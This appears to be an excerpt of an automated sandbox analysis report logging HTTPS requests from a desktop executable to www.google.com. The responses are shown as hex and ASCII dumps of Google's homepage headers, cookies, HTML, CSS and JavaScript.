                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e 20 72 28 22 22 2c 61 2c 62 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 6f 6f 67 6c
                                                                                                                                                                                                                Data Ascii: on(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){googl
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 2d 39 39 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65
                                                                                                                                                                                                                Data Ascii: font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;position:absolute;top:-999px;visibility:hidde
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d 34 70 78 5c 30 2f 3b 6c 65 66 74 3a 2d 36 70 78 5c 30 2f 3b 72 69 67 68 74 3a 35 70 78 5c 30 2f 3b 62 6f 74 74 6f 6d 3a 34 70 78
                                                                                                                                                                                                                Data Ascii: radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-4px\0/;left:-6px\0/;right:5px\0/;bottom:4px
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62 20 2e 67 62 74 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63
                                                                                                                                                                                                                Data Ascii: font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb .gbts{background:url(https://ssl.gstatic.c
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f
                                                                                                                                                                                                                Data Ascii: :relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 32 29 3b 2d 6f 2d 62 6f 78 2d 73 68 61 64 6f 77 3a
                                                                                                                                                                                                                Data Ascii: in:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 37 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 20 30 3b 77 68 69
                                                                                                                                                                                                                Data Ascii: #gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-serif;line-height:27px;padding:10px 20px 0;whi


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                17192.168.2.649727142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1199INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:04 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-XzuwZpsD2ZR0AI_5cremPA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                Set-Cookie: AEC=AZ6Zc-UvxH93ZpufOxQTausr9hy6zUu_Ib88iAli4OF7ZZKsI02GzemuDQM; expires=Sun, 13-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                                Set-Cookie: NID=520=APCl03UP05EIWaB8hAuCXgOogVCAv-NJZN-qtAhrf7vfz4iCXWhitROQQKOVtmimohul6C9A6xEhTDr4xcvxxDy5OtzSXY1qVJo_Td_aPFeiY7E9Pi-AtLfnKc0U8n38V1AYEmXbVRhE5H6otlDph_jMeGic21M3pvPicqZpK3_YafkNg5Djx5MDTXXX-iUqVzExfmC2swNDgQq1nQ; expires=Wed, 16-Jul-2025 11:48:04 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC191INData Raw: 34 38 36 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65
                                                                                                                                                                                                                Data Ascii: 4865<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74
                                                                                                                                                                                                                Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_st
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 31 2c 35 2c 32 37 30 2c 31 2c 38 35 2c 35 31 2c 36 33 31 2c 31 2c 33 38 37 2c 32 2c 32 35 31 2c 31 31 34 32 2c 31 34 32 2c 32 35 32 2c 33 35 30 2c 35 38 2c 33 2c 31 38 33 2c 32 32 34 2c 36 39 32 2c 35 34 2c 31 2c 37 37 37 2c 31 37 35 2c 31 2c 38 31 2c 33 30 36 2c 31 39 31 2c 38 37 31 2c 39 33 31 2c 32 32 2c 31 38 31 2c 31 34 34 2c 32 30 31 2c 33 35 34 2c 31 32 31 2c 31 38 36 2c 32 35 2c 38 31 33 2c 31 37 2c 33 2c 36 39 36 2c 31 30 36 2c 36 38 37 2c 35 35 33 2c 32 2c 34 39 37 2c 31 37 39 2c 37 35 30 2c 31 34 39 2c 32 2c 35 32 36 2c 31 36 38 2c 33 2c 35 2c 34 30 35 2c 36 39 33 2c 31 2c 39 33 36 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 34 31 2c 37 32 36 2c 36 34 37 2c 33 2c 39 2c 32 31 31 2c 34 39 39 2c 33 30 37 2c 33 33 34 2c 31 35 2c 31 2c 31 2c 31 2c 37 38 2c
                                                                                                                                                                                                                Data Ascii: 1,5,270,1,85,51,631,1,387,2,251,1142,142,252,350,58,3,183,224,692,54,1,777,175,1,81,306,191,871,931,22,181,144,201,354,121,186,25,813,17,3,696,106,687,553,2,497,179,750,149,2,526,168,3,5,405,693,1,936,1,5,4,4,4,141,726,647,3,9,211,499,307,334,15,1,1,1,78,
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 65 74 4c 45 49 3d 70 3b 67 6f 6f 67 6c 65 2e 6d 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76
                                                                                                                                                                                                                Data Ascii: etLEI=p;google.ml=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===v
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e
                                                                                                                                                                                                                Data Ascii: &b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{backgroun
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 70 78 3b 6c 65 66 74 3a 2d 32 70 78 3b 72 69 67 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70
                                                                                                                                                                                                                Data Ascii: px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";op
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74
                                                                                                                                                                                                                Data Ascii: padding-bottom:1px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-t
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 39 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f
                                                                                                                                                                                                                Data Ascii: ;line-height:9px;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 68 74 3a 62 6f 6c 64 7d 2e 67 62 6d 68 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65
                                                                                                                                                                                                                Data Ascii: ht:bold}.gbmh{border-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebe
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC1390INData Raw: 2d 74 6f 70 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70
                                                                                                                                                                                                                Data Ascii: -top:none;color:#000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13p


                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                18192.168.2.649731142.250.185.2284434924C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                2025-01-14 11:48:04 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                2025-01-14 11:48:05 UTC1198INHTTP/1.1 200 OK
                                                                                                                                                                                                                Date: Tue, 14 Jan 2025 11:48:04 GMT
                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                                                                Content-Type: text/html; charset=ISO-8859-1
